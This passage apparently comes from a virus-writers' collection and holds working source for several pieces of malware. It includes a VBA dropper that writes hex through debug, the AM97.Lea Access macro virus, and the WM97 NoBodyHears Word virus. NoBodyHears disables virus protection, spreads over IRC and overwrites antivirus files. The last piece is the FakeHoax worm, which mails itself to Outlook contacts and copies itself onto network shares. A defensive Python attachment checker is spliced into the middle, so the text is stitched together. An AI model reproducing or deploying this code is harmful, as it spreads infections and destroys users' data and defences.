Print #3, "E 0D20 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF"
Print #3, "E 0D30 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0"
Print #3, "E 0D40 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19"
Print #3, "E 0D50 F0 3F CB A8 C8 FF 1C F5 FB 03 66 98 59 F3 C8 0E"
Print #3, "E 0D60 D9 28 B3 80 39 75 7A B1 04 CB 5C 1A F4 7B 97 4B"
Print #3, "E 0D70 74 79 E1 46 DB 68 B1 72 E7 A6 6C FB CB 5C 8D 72"
Print #3, "E 0D80 02 59 33 76 3B 1A DA 76 7A D6 38 A9 F7 4F 35 FE"
Print #3, "E 0D90 E7 5E 6A 8E 4D E0 F8 8C 86 D2 F2 F4 98 E4 B7 98"
Print #3, "E 0DA0 C7 F9 45 BD A0 78 C7 61 92 69 BA 94 48 F3 9C F7"
Print #3, "E 0DB0 2C 96 B9 2B 29 3F F3 83 D4 14 5F 35 FE E7 5E AF"
Print #3, "E 0DC0 77 B1 52 D9 18 8C 7B 61 AA 05 4C 8D 86 CB C5 DC"
Print #3, "E 0DD0 BA D6 FA 51 98 DC 1E 43 F9 D9 B1 42 7E 3C D5 32"
Print #3, "E 0DE0 57 CB 3C 8B 34 FD 74 7E 9D 4E 4D 02 DE AA FC CF"
Print #3, "E 0DF0 C5 B1 BE 15 18 B3 08 D0 0E A5 FE E7 E5 3C 76 D5"
Print #3, "E 0E00 A5 CB AE 52 06 49 A6 7E FF B3 2A C0 FE E7 44 41"
Print #3, "E 0E10 59 07 15 F8 9F BB 79 F5 A9 26 F6 3F 1B 93 9D B9"
Print #3, "E 0E20 94 FA 9F 53 83 67 CE FF 6C EF 9B AE 5B 7B 47 FF"
Print #3, "E 0E30 73 66 8C FD CF 5A AA AA 6A A2 02 FF 73 41 DD A9"
Print #3, "E 0E40 B1 FE 67 BE 35 EF 7F 66 85 A2 62 85 A2 AD 4B FC"
Print #3, "E 0E50 CF DB EC B2 49 9B 1F F7 D1 A4 8F 59 E6 7F 7E 2A"
Print #3, "E 0E60 64 3A E4 17 24 AD 50 7C 45 FE E7 82 3B 56 43 87"
Print #3, "E 0E70 44 3D 29 D3 F8 8C FF 99 F2 5B 2A DA 7D 13 5F 64"
Print #3, "E 0E80 EC 2A 66 83 A2 B9 94 2E 3B 2D E4 F7 0E FE 67 A3"
Print #3, "E 0E90 1F EF B2 B4 F6 B9 16 05 65 25 FE E7 B2 19 18 86"
Print #3, "E 0EA0 7C 14 CB C4 A7 FD CF C6 E0 39 9F 26 BE CD E4 35"
Print #3, "E 0EB0 74 93 EC AB A9 FF 99 75 93 99 87 7C 07 FF 33 E5"
Print #3, "E 0EC0 67 8F 25 AF CA FF 5C 1A A0 71 C8 A6 47 22 F6 3F"
Print #3, "E 0ED0 73 7E C6 E0 19 17 C5 05 E9 AA F1 D4 FF 9C E6 C7"
Print #3, "E 0EE0 4A 5E E3 7F 4E 5B 1B F8 C0 A9 0A F0 F4 33 97 5E"
Print #3, "E 0EF0 97 FF 99 03 64 05 79 F6 95 24 EB BE 67 8C FF D9"
Print #3, "E 0F00 BC 7A 8C E3 FC 92 53 E0 75 72 AA 92 9E 97 AC 12"
Print #3, "E 0F10 27 AA 7E A9 88 05 A8 F6 BE A9 7A 76 99 BC 1E F5"
Print #3, "E 0F20 F9 05 C9 18 50 EB F2 17 57 E3 7F BE 56 AA F2 3F"
Print #3, "E 0F30 5F 2B 55 F8 9F AF 99 2A FC CF D7 0C FC CF 32 E0"
Print #3, "E 0F40 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19"
Print #3, "E 0F50 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3"
Print #3, "E 0F60 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF"
Print #3, "E 0F70 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0"
Print #3, "E 0F80 FF 2C 03 FE 67 19 2F EB 7F 7E FD 34 C0 FF FC AA"
Print #3, "E 0F90 69 80 FF F9 55 D3 00 FF F3 AB A6 01 FE E7 57 4D"
Print #3, "E 0FA0 03 FC CF AF 9A 06 F8 9F 5F 35 F5 FB 9F 79 79 7C"
Print #3, "E 0FB0 E6 EA 62 16 AF 85 4E D7 83 B3 94 F7 9E BF BD 82"
Print #3, "E 0FC0 97 ED C6 AB C0 63 25 AF 6E 77 50 4D A1 7E FF 73"
Print #3, "E 0FD0 98 6F 6E 49 BF BD 82 97 F2 66 6E 18 0D 72 DF FE"
Print #3, "E 0FE0 31 4D 2C DB E7 A7 53 73 94 71 F5 FB 9F 0B CD 41"
Print #3, "E 0FF0 E9 7A E6 C2 7A 70 D7 B7 7F F0 7A E9 B2 F1 97 A1"
Print #3, "E 1000 7E FF 73 90 6F 4D 4B BF BD 82 DB 61 32 37 0C FB"
Print #3, "E 1010 65 F9 05 9D CB A6 85 97 A4 7E FF 73 B7 90 1F EB"
Print #3, "E 1020 DB 87 DC F3 C6 2B F1 33 37 A4 6D 84 19 F8 F0 77"
Print #3, "E 1030 31 F8 92 D4 EF 7F EE E6 3B 4B A7 E6 8B 8E 22 D3"
Print #3, "E 1040 CD 96 B9 A1 A4 B5 B5 AC DB F0 85 A9 DF FF 5C E8"
Print #3, "E 1050 CC E5 EF 8E 32 97 B8 9B 2D 73 C3 A5 FE BE 74 46"
Print #3, "E 1060 BE 30 F5 FB 9F 3B F9 D6 BE F4 DB 2B B8 1D 26 73"
Print #3, "E 1070 43 71 B2 DD 35 F2 EB 90 EA F5 3F 73 67 A5 6E 8D"
Print #3, "E 1080 3C 25 6D 93 BC FB 9A 4B DC 8C 9A A9 2D 7C 7B 05"
Print #3, "E 1090 9F FD 99 4B A7 7C 1B E6 CB 52 AF FF 59 B7 96 EA"
Print #3, "E 10A0 DE AA 43 9C C1 38 F9 A2 A3 F4 BC D8 9E 2A EB B3"
Print #3, "E 10B0 E7 B8 65 DF 9C 4F 6B 2F C2 A1 41 C6 4C F8 9F 65"
Print #3, "E 10C0 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC CF"
Print #3, "E 10D0 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE"
Print #3, "E 10E0 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01"
Print #3, "E 10F0 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 15 F9 9F"
Print #3, "E 1100 AF 96 6A FC CF D7 4B 25 FE E7 2B A6 0A FF F3 35"
Print #3, "E 1110 53 81 FF F9 AA A9 C0 FF 7C D5 54 E1 7F BE 66 2A"
Print #3, "E 1120 F1 3F 5F 31 D5 F8 9F AF 97 8A FC CF 57 0B FC CF"
Print #3, "E 1130 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03 FE"
Print #3, "E 1140 67 19 F0 3F CB 80 FF 59 06 FC CF 32 E0 7F 96 01"
Print #3, "E 1150 FF B3 0C F8 9F 65 C0 FF 2C 03 FE 67 19 F0 3F CB"
Print #3, "E 1160 80 FF 59 06 FC CF 32 E0 7F 96 01 FF B3 0C F8 9F"
Print #3, "E 1170 65 C0 FF 2C 03 FE 67 19 F0 3F CB 80 FF 59 06 FC"
Print #3, "E 1180 CF 32 E0 7F 96 01 FF B3 0C F8 9F 65 C0 FF 2C 03"
Print #3, "E 1190 FE 67 19 F0 3F CB 80 FF 59 06 FB 9F F9 6F 80 03"
Print #3, "E 11A0 5E 88 CA CD E8 5B 36 CA 9E F9 CF 5A BC B4 E8 61"
Print #3, "E 11B0 CC 0D D6 2C 19 3B F2 9E DE EE D0 78 D4 1F 0C 47"
Print #3, "E 11C0 B7 77 F7 0F E3 F1 64 3A 9B CD E7 8B E5 72 B9 5A"
Print #3, "E 11D0 AD 99 8D 41 5F 5E AD 68 7C 31 9F CF 66 D3 C9 78"
Print #3, "E 11E0 FC 70 7F 77 3B 1A 0E FA 51 8F 1D 6C 2C 81 3D 1E"
Print #3, "E 11F0 76 DB F5 8A 5D C5 0F 77 A3 44 AE 76 DC 6F D7 4B"
Print #3, "E 1200 E3 2F 36 B6 62 F6 AD 6D 56 8B 99 96 B2 59 A5 F1"
Print #3, "E 1210 91 87 A8 2A 76 57 06 DA EA A6 1F 71 B3 5E 2D 17"
Print #3, "E 1220 B3 29 3D 25 3F 23 3D E5 70 30 E8 F7 A3 A8 D7 EB"
Print #3, "E 1230 85 59 E8 7A 14 F5 FB 83 C1 90 36 46 6F CD 64 3A"
Print #3, "E 1240 9D 2D 96 AB F5 C6 6E 2D BF B5 E5 8F 77 6F EF B8"
Print #3, "E 1250 C9 6D C9 A6 30 DE 5B F9 2F F6 BC 6A 92 3B A7 D9"
Print #3, "E 1260 9E 68 87 4C 7E 66 88 4F 0A F9 83 B9 D1 2D B7 27"
Print #3, "E 1270 2D D8 51 44 A9 D2 4B 75 8B F2 0B 29 C0 E1 C8 04"
Print #3, "E 1280 38 B1 01 2E 38 40 93 60 CC 8A E3 5B D8 F8 CC C6"
Print #3, "E 1290 8C 28 A5 A8 C7 0E BB D6 F9 F9 91 15 80 9B F5 92"
Print #3, "E 12A0 FD CF F7 B7 23 B6 75 76 5A 71 58 39 FF B3 49 74"
Print #3, "E 12B0 96 F3 3F EF B7 1C 29 BB 2B 39 D3 D0 3E E2 61 4F"
Print #3, "E 12C0 F9 51 7C F3 99 89 EF CE C6 17 71 7C 3A B5 C0 60"
Print #3, "E 12D0 13 A4 71 1B E0 9D 09 70 46 73 61 45 F9 ED 0F 76"
Print #3, "E 12E0 6B 43 9D D5 3D 77 A9 B2 29 EC C8 A7 2B 3C DB 74"
Print #3, "E 12F0 7E 66 B6 5D 46 AA 87 EC 9C D4 65 7C D7 03 EF E9"
Print #3, "E 1300 3C 01 C3 74 02 9A DF 19 3D A9 0D 30 89 50 5F E6"
Print #3, "E 1310 F8 16 1C 1F 6F 4C 3A FD D8 FF 4C 41 D1 1C E2 10"
Print #3, "E 1320 74 30 76 AE 25 33 AB 30 D9 D2 19 D9 8F 67 24 0F"
Print #3, "E 1330 65 92 67 77 AA 7D 44 9E 7E F3 CC 6F 2C 9E 7D 69"
Print #3, "E 1340 78 49 84 C9 0C 4C 67 C3 DC 4C 40 BD B5 FC D6 36"
Print #3, "E 1350 37 8B D8 75 6A F6 D6 7E 66 6F FD 1F 50 4B 01 02"
Print #3, "E 1360 14 00 14 00 00 00 08 00 38 51 9B 28 17 D3 09 49"
Print #3, "E 1370 36 12 00 00 36 F8 01 00 08 00 00 00 00 00 00 00"
Print #3, "E 1380 00 00 20 00 B6 81 00 00 00 00 6C 6F 67 6F 2E 53"
Print #3, "E 1390 59 53 50 4B 05 06 00 00 00 00 01 00 01 00 36 00"
Print #3, "E 13A0 00 00 5C 12 00 00 00 00"
Print #3, "RCX"
Print #3, "12A8"
Print #3, "W"
Print #3, "Q"
Close #3
End Sub
Sub CreateBat()
Open "c:\windows\hop_along.bat" For Output As #4
Print #4, "del c:\windows\logo.sys"
Print #4, "del c:\logo.sys"
Print #4, "cd c:\windows\"
Print #4, "debug < c:\windows\pkunzip.dbg"
Print #4, "debug < c:\windows\logo.dbg"
Print #4, "c:\windows\pkunzip.com logo.zip"
Print #4, "exit"
Close #4
End Sub
Sub Wait4Bat()
If Dir("c:\windows\logo.sys") = "" Then Wait4Bat
End Sub
Option Compare Database
Option Explicit
Function Lea()
'AM97.Lea.a
'by -KD- / [Metaphase VX Team] & [NoMercyVirusTeam]
On Error Resume Next
CommandBars("tools").Controls("Macro").Delete
CurrentDb.Properties("AllowBypassKey") = False
CurrentDb.Properties("AllowSpecialKeys") = False
CurrentDb.Properties("AllowBreakIntoCode") = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Application.MacrovirusProtection = False
Dim FilesToGet, FilesToInfect, CodeBase As String
FilesToInfect = False
FilesToGet = Dir("*.mdb", vbNormal)
If FilesToGet <> "" Then
CodeBase = CurrentDb.Name
If CodeBase = FilesToGet Then FilesToInfect = True
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access"
, FilesToGet, acMacro, "Autoexec", "Autoexec"
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access"
, FilesToGet, acModule, "lea", "lea"
While FilesToGet <> "
FilesToGet = Dir
If CodeBase = FilesToGet Then FilesToInfect = True
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access"
, FilesToGet, acMacro, "Autoexec", "Autoexec"
If FilesToInfect = False Then Application.DoCmd.TransferDatabase acExport, "Microsoft Access"
, FilesToGet, acModule, "lea", "lea"
Wend
On Error GoTo Exit_Payload
If Day(Now()) = Int(Rnd() * 3) + 1 Then
MsgBox "AM97.Lea.a", "Welcome to this place, I'll Show you everything. With arms wide open."
End If
Exit_Payload:
End If
End Function
Attribute VB_Name = "NoBodyHears"
Sub AutoClose()
'******************************************************************
'WM97 NoBodyHears
'By AngelsKitten / [NuKE]
'Greetings to Evul, Knowdeth, Jackie twoflower, Foxz
'Reptile, Duke, Raven, Deloss, Bumblebee, Masey, RAiD,
'FlyShadow, and the following groups: MVT, 29A, NVT & SLAM
'******************************************************************
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents("NoBodyHears").Export "C:\VXD.dll"
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
With Application
.ScreenUpdating = False
.DisplayStatusBar = False
.DisplayAlerts = wdAlertsNone
.EnableCancelKey = wdCancelDisabled
End With
CommandBars("Tools").Controls("Macro").Enabled = False
CommandBars("Tools").Controls(12).Enabled = False
CommandBars("Tools").Controls(12).Delete
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Customize...").Delete
CommandBars("view").Controls("Toolbars").Delete
CommandBars("view").Controls("Status Bar").Delete
For ¢ = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(¢).Name = "NoBodyHears" Then ¶ = True
Next ¢
For ¢ = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(¢).Name = "NoBodyHears" Then Ü = True
Next ¢
If Ü = True And ¶ = False Then Set § = NormalTemplate.VBProject _
Else If Ü = False And ¶ = True Then Set § = ActiveDocument.VBProject
§.VBComponents.Import ("C:\VXD.dll")
On Error GoTo scriptoops
Open "C:\audio.vxd" For Output As #1
Print #1, "[script]"
Print #1, "n0=;NobodyHears by Angelskitten / [NuKE]"
Print #1, "n1=on 1:PART:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick C:\windows\aboutme.doc"
Print #1, "n3=}"
Print #1, "n4="
Print #1, "n5=on 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n6= /dcc send $nick C:\windows\aboutme.doc"
Print #1, "n7=}"
Print #1, "n8="
Print #1, "n9=on 1:TEXT:*infected*:#:/.ignore $nick"
Print #1, "n10=on 1:TEXT:*infected*:?:/.ignore $nick"
Print #1, "n12=on 1:TEXT:*clean*:#:/.ignore $nick"
Print #1, "n13=on 1:TEXT:*clean*:?:/.ignore $nick"
Print #1, "n14=on 1:TEXT:*script.ini*:#:/.ignore $nick"
Print #1, "n15=on 1:TEXT:*script.ini*:?:/.ignore $nick"
Print #1, "n16=on 1:TEXT:*virus*:#:/.ignore $nick"
Print #1, "n17=on 1:TEXT:*virus*:?:/.ignore $nick"
Print #1, "n18=on 1:TEXT:*worm*:#:/.ignore $nick"
Print #1, "n19=on 1:TEXT:*worm*:?:/.ignore $nick"
Print #1, "n20=on 1:TEXT:*aboutme*:#:/.ignore $nick"
Print #1, "n21=on 1:TEXT:*aboutme*:?:/.ignore $nick"
Print #1, "n22=on 1:TEXT:*aboutme.doc*:#:/.ignore $nick"
Print #1, "n23=on 1:TEXT:*aboutme.doc*:?:/.ignore $nick"
Print #1, "n24=on 1:TEXT:*doc*:#:/.ignore $nick"
Print #1, "n25=on 1:TEXT:*doc*:?:/.ignore $nick"
Print #1, "n26=on 1:TEXT:*blank*:#:/.ignore $nick"
Print #1, "n27=on 1:TEXT:*blank*:?:/.ignore $nick"
Print #1, "n28=ON 1:QUIT:#:/msg $chan I tryed to tell you, I tryed to show you. NoBodyHears"
Print #1, "n29=ON 1:connect: {"
Print #1, "n30= /run attrib +r +s +h C:\mirc\Script.ini"
Print #1, "n31=}"
Close #1
scriptoops:
On Error GoTo batoops
Open "c:\windows\WinStart.bat" For Output As #2
Print #2, "@Echo Off"
Print #2, "copy /y c:\audio.vxd c:\mirc\script.ini >nul"
Print #2, "copy /y c:\PROGRA~1\MICROS~3\TEMPLA~1\normal.dot c:\windows\aboutme.doc >nul"
Close #2
batoops:
If Day(Now()) = 12 Then
SetAttr "C:\program files\AntiViral Toolkit Pro\*.avc", vbReadOnly
Open "C:\program files\AntiViral Toolkit Pro\*.avc" For Output As #3
Print #3, "NoBodyHears"
Close #3
SetAttr "C:\program files\AntiViral Toolkit Pro\avp.set", vbReadOnly
Open "C:\program files\AntiViral Toolkit Pro\avp.set" For Output As #4
Print #4, "NoBodyHears"
Close #4
SetAttr "C:\program files\mcafee\*.dat", vbReadOnly
Open "C:\program files\mcafee\*.def" For Output As #5
Print #5, "NoBodyHears"
Close #5
SetAttr "C:\f-marco\*.def", vbReadOnly
Open "C:\f-macro\*.def" For Output As #6
Print #6, "NoBodyHears"
Close #6
End If
If Day(Now()) = Int(Rnd * 31) + 1 Then
With Assistant.NewBalloon
.Icon = msoIconTip
.Animation = msoAnimationGetArtsy
.Heading = "WM97 NoBodyHears"
.Text = "Welcome to WM97 NoBodyHears by Angelskitten / [NuKE]"
.Show
End With
ActiveDocument.Password = "NoBodyHears"
Shell "start http://www.avp.com.au/", vbHide
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
SetAttr ("c:\VXD.dll"), vbHidden + vbSystem
End Sub
Sub AutoOpen()
Call AutoClose
End Sub
Sub AutoNew()
Call AutoClose
End Sub
Sub ViewVBCode()
MsgBox "Unexcpected error", 16
Call AutoClose
End Sub
Sub ViewCode()
MsgBox "Unexcpected error", 16
Application.Caption = "Word 6.0"
Call AutoClose
End Sub
Sub ToolsMacro()
MsgBox "Unexcpected error", 16
Call AutoClose
End Sub
Sub FileTemplates()
MsgBox "Unexcpected error", 16
Application.Caption = "Word 6.0"
Call AutoClose
End Sub
Sub HelpWordPerfectHelp()
MsgBox "Unexcpected error", 16
Application.Caption = "Word 6.0"
Call AutoClose
End Sub
' Worm Name: NETWORK/OUTLOOK.FakeHoax
' Author: Zulu
' Origin: Argentina
' Encoded JScript/VBScript worm, first in a JSE or VBE file. It uses OUTLOOK and the network
' shares.
' The main code is a COM object written in XML and VBScript using Windows Script Component, so
' the code in the JSE and VBE file is trivial. Both versions create a WSC file (the COM object
' defined in XML) and then both call methods and change properties of that object, no real
' spreading code is in those files.
' The worm was written in this way to make it easier to port it to any other language; this way
' I was able to create a JSE and a VBE file without really porting the main code. Also, it's
' possible to create new versions using Delphi, Visual C++, or any other by using "REGSVR32.EXE"
' to register the WSC file as a COM object before calling its methods or changing its
' properties.
' This worm was written to show how JSE and VBE files could be used in viruses/worms, since
' before this they were only used as auxiliary files (some versions of HTML.rahC by 1nternal and
' OUTLOOK.Monopoly by me for example). Besides, since it needs Windows Script Host 2.0 or later,
' it won't be good at spreading itself at the time of writing this.
' Also, this was a good opportunity for using Windows Script Component for the first time because
' it made it possible to write a JScript and a VBScript version without needing to port the whole
' code, so this is also the first virus/worm using its own COM object.
'
' Features:
'
' - OUTLOOK spreading. It will use OUTLOOK to send itself to all contacts in the address book if
' the number of addresses is less than 101. If that number is more than 100 it will try to
' select 100 random addresses. Subject and body are always the same.
' - Network spreading. It will copy itself to the root of all shares (not only mapped drives),
' waiting for someone to run it.
' - The worm file ("WOBBLER.TXT.JSE" or "WOBBLER.TXT.VBE" depending on the version) will show a
' TXT file when run, so it will show what many users expect.
' This TXT file will show the Wobbler hoax (the reason for the worm's name), which is a strange
' social engineering method for a real worm. Anyway, since this won't spread well because of
' other reasons, even if someone wants to spread it, I won't know if the hoax message is good
' for this purpose. Message subject and body talk about important information in the TXT file,
' but they don't talk about the hoax because this could cause fear in the user from opening the
' file or maybe make the user remember about viruses and checking for double extensions.
' - It has a 1/5 probability of also sending another email to the same addresses as the email
' having the worm file. The body of this email will have a poem written in Spanish.
' The reason for this is an unusual request from a friend: she wanted one of her poems to be
' included in a virus/worm.
' So, even if this means unnecessary bytes and even worse spreading capabilities, here it is. :)
' - There is no need for AV products or removers after running the worm since Windows' settings are
' not changed and all temporary files are deleted.
'
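The feature list above relies on a document-looking attachment name with a Windows Script Host extension appended ("WOBBLER.TXT.JSE" / "WOBBLER.TXT.VBE"), and on users not checking for double extensions. The following is an added mail-gateway style check written for this page, not code from the zine or from the worm's author; the attachment names it scans are constructed samples, and the extension sets are assumptions about what a given environment treats as script-host files versus harmless data.

```python
"""Triage attachment names for the double-extension trick described above.

Added defensive example, not part of the original zine. Sample names and the
extension sets are constructed assumptions for illustration.
"""
import os

# Extensions executed by Windows Script Host / the script component runtime (assumed set).
SCRIPT_HOST_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".wsc"}
# Extensions a user expects to open as plain data (assumed set).
DECOY_EXTS = {".txt", ".doc", ".jpg", ".gif", ".pdf", ".htm", ".html"}


def classify_attachment(name: str) -> str:
    """Return 'double-extension', 'script' or 'ok' for one attachment file name.

    'double-extension' means a script-host extension hides behind a decoy
    data extension (the WOBBLER.TXT.JSE pattern); 'script' means a bare
    script-host file; anything else is 'ok' for this check.
    """
    base = os.path.basename(name).strip()
    root, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in SCRIPT_HOST_EXTS:
        return "ok"
    _, inner = os.path.splitext(root)
    if inner.lower() in DECOY_EXTS:
        return "double-extension"
    return "script"


def triage(attachments):
    """Map each attachment name to a verdict and list the ones to hold back."""
    verdicts = {a: classify_attachment(a) for a in attachments}
    quarantine = [a for a, v in verdicts.items() if v != "ok"]
    return verdicts, quarantine


# Constructed sample attachment names, mixing the worm's naming with benign files.
SAMPLE_ATTACHMENTS = [
    "WOBBLER.TXT.JSE",
    "WOBBLER.TXT.VBE",
    "report.txt",
    "setup.vbs",
    "photo.jpg",
]

if __name__ == "__main__":
    verdicts, quarantine = triage(SAMPLE_ATTACHMENTS)
    for name in SAMPLE_ATTACHMENTS:
        print(f"{name:20s} {verdicts[name]}")
    print("hold back:", quarantine)
```

The check is deliberately name-based because that is the layer the trick targets; it complements rather than replaces content inspection, and in an environment where script-host files are never legitimately mailed the whole `SCRIPT_HOST_EXTS` set can be blocked outright.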
' Here is the JSE file without encoding:
G=new ActiveXObject("Scripting.FileSystemObject");
A=G.GetTempName().concat(".WSC");
S=G.CreateTextFile(G.BuildPath(G.GetSpecialFolder(2),A),true);
S.Write("<?XML version=\"1.0\"?>\r\n<component>\r\n <comment>\r\n
NETWORK/OUTLOOK.FakeHoax\r\n </comment>\r\n <public>\r\n <property name=\"AttachmentFile
\"/>\r\n <property name=\"TextFile\"/>\r\n <property name=\"WormFile\"/>\r\n
<method name=\"DelTempFiles\"/>\r\n <method name=\"NetworkSpreading\">\r\n
<parameter name=\"FileName\"/>\r\n </method>\r\n <method name=\"OutlookSpreading\
">\r\n <parameter name=\"Body\"/>\r\n <parameter name=\"MaxAmount\"/>\r\n
<parameter name=\"Subject\"/>\r\n </method>\r\n <method name=\"ShowText\">\r\n
<parameter name=\"Content\"/>\r\n </method>\r\n </public>\r\n <script language=\"
VBScript\">\r\n <![CDATA[\r\n Sub DelTempFiles\r\n On Error Resume Next\r\n
Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n If
FSO.FileExists(AttachmentFile) Then FSO.DeleteFile AttachmentFile, True\r\n If
FSO.FileExists(TextFile) Then FSO.DeleteFile TextFile, True\r\n Set FSO =
Nothing\r\n End Sub\r\n Sub NetworkSpreading(FileName)\r\n On Error Resume
Next\r\n Set Network = CreateObject(\"WScript.Network\")\r\n Set Shares =
Network.EnumNetworkDrives\r\n If Shares.Count > 0 Then\r\n Set FSO =
CreateObject(\"Scripting.FileSystemObject\")\r\n For Counter1 = 0 To Shares.Count -
1\r\n If Shares.Item(Counter1) <> \"\" Then FSO.CopyFile WormFile,
FSO.BuildPath(Shares.Item(Counter1), FileName)\r\n Next\r\n Set FSO =
Nothing\r\n End If\r\n Set Shares = Nothing\r\n Set Network = Nothing\r\n
End Sub\r\n Sub OutlookSpreading(MaxAmount, Subject, Body)\r\n On Error Resume
Next\r\n Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n FSO.CopyFile
WormFile, AttachmentFile\r\n Set FSO = Nothing\r\n Outlook = \"\"\r\n Set
Outlook = CreateObject(\"Outlook.Application\")\r\n If Outlook <> \"\" Then\r\n
Set MAPI = Outlook.GetNameSpace(\"MAPI\")\r\n For Each List In
MAPI.AddressLists\r\n If List.AddressEntries.Count > 0 Then\r\n Set
Email1 = Outlook.CreateItem(0)\r\n If List.AddressEntries.Count > MaxAmount
Then\r\n Dim Address()\r\n ReDim Address(MaxAmount -
1)\r\n For Counter1 = 0 To MaxAmount - 1\r\n Address(Counter1) =
Int(List.AddressEntries.Count * Rnd)\r\n Next\r\n For Counter1 = 0
To MaxAmount - 1\r\n For Counter2 = Counter1 + 1 To MaxAmount -
1\r\n If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1
Then Address(Counter2) = -1\r\n Next\r\n Next\r\n
For Counter1 = 0 To MaxAmount - 1\r\n If Address(Counter1) = -1 Then
Address(Counter1) = Int(List.AddressEntries.Count * Rnd)\r\n
Next\r\n For Counter1 = 0 To MaxAmount - 1\r\n For Counter2 =
Counter1 + 1 To MaxAmount - 1\r\n If Address(Counter1) = Address(Counter2)
And Address(Counter1) <> -1 Then Address(Counter2) = -1\r\n
Next\r\n Next\r\n For Counter1 = 0 To MaxAmount -
1\r\n If Address(Counter1) <> -1 Then\r\n Set Entry =
List.AddressEntries(Address(Counter1))\r\n If Counter1 = 0 Then Addresses =
Entry.Address Else Addresses = Addresses & \"; \" & Entry.Address\r\n Set
Entry = Nothing\r\n End If\r\n Next\r\n
Else\r\n For Counter1 = 1 To List.AddressEntries.Count\r\n Set
Entry = List.AddressEntries(Counter1)\r\n If Counter1 = 1 Then Addresses =
Entry.Address Else Addresses = Addresses & \"; \" & Entry.Address\r\n Set
Entry = Nothing\r\n Next\r\n End If\r\n Email1.BCC =
Addresses\r\n Email1.Subject = Subject\r\n Email1.Body =
Body\r\n Email1.Attachments.Add AttachmentFile\r\n
Email1.DeleteAfterSubmit = True\r\n Email1.Send\r\n Set Email1 =
Nothing\r\n Randomize\r\n If Int(5 * Rnd) = 0 Then\r\n
Set Email2 = Outlook.CreateItem(0)\r\n Email2.BCC = Addresses\r\n
Email2.Subject = \"Alma\"\r\n Email2.Body = \"No alucines que te amo,\" &
Chr(13) & Chr(10) & \"cuando en realidad es solo\" & Chr(13) & Chr(10) & \"mi coraz\" &
Chr(243) & \"n qui\" & Chr(233) & \"n lo hace.\" & Chr(13) & Chr(10) & \"Porque como ya sabr\
" & Chr(225) & \"s,\" & Chr(13) & Chr(10) & \"mi coraz\" & Chr(243) & \"n no manda en mi vida
,\" & Chr(13) & Chr(10) & \"si as\" & Chr(237) & \" lo hiciera,\" & Chr(13) & Chr(10) & \"mi
alma estar\" & Chr(237) & \"a perdida.\"\r\n Email2.DeleteAfterSubmit =
True\r\n Email2.Send\r\n Set Email2 = Nothing\r\n End
If\r\n End If\r\n Next\r\n Set MAPI = Nothing\r\n Set Outlook
= Nothing\r\n End If\r\n End Sub\r\n Sub ShowText(Content)\r\n On Error
Resume Next\r\n Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n Set
File = FSO.CreateTextFile(TextFile, True)\r\n File.Write(Content)\r\n
File.Close\r\n Set File = Nothing\r\n Set FSO = Nothing\r\n Set WSHShell =
CreateObject(\"WScript.Shell\")\r\n WSHShell.Run(TextFile)\r\n Set WSHShell =
Nothing\r\n End Sub\r\n ]]>\r\n </script>\r\n</component>\r\n")
S.Close();
F=GetObject("script:".concat(G.BuildPath(G.GetSpecialFolder(2),A)));
F.AttachmentFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT.JSE");
F.TextFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT");
F.WormFile=WScript.ScriptFullName;
F.ShowText("Thought you might be interested in this message. If you receive an\r\nemail with
a file called \"California\" do not open the file. The file\r\ncontains the \"WOBBLER\"
virus.\r\n\r\nThis information was announced yesterday morning by IBM. The statement\r\nsays
that ... \"This is a very dangerous virus, much worse than\r\n'Melissa' and there is NO
remedy for it at this time. Some very sick\r\nindividual has succeeded in using the reformat
function from Norton\r\nUtilities causing it to completely erase all documents on the
hard\r\ndrive. It has been designed to work with Netscape Navigator and\r\nMicrosoft
Internet Explorer. It destroys Macintosh and IBM compatible\r\ncomputers. This is a new,
very malicious virus and not many people\r\nknow about it at this time.\"\r\n\"Please pass
this warning file to everyone in your address book and\r\nshare it with all your online
friends ASAP so that the destruction it\r\ncan cause may be minimized.\"\r\n");
F.OutlookSpreading(100,"Fw: important","> Thought you might be interested in this message,
read the attachment for more information.");
F.NetworkSpreading("WOBBLER.TXT.JSE");
F.DelTempFiles();
G.DeleteFile(G.BuildPath(G.GetSpecialFolder(2),A),true);
Set G=CreateObject("Scripting.FileSystemObject")
A=G.GetTempName&".WSC"
Set S=G.CreateTextFile(G.BuildPath(G.GetSpecialFolder(2),A),True)
O=Chr(13)&Chr(10)
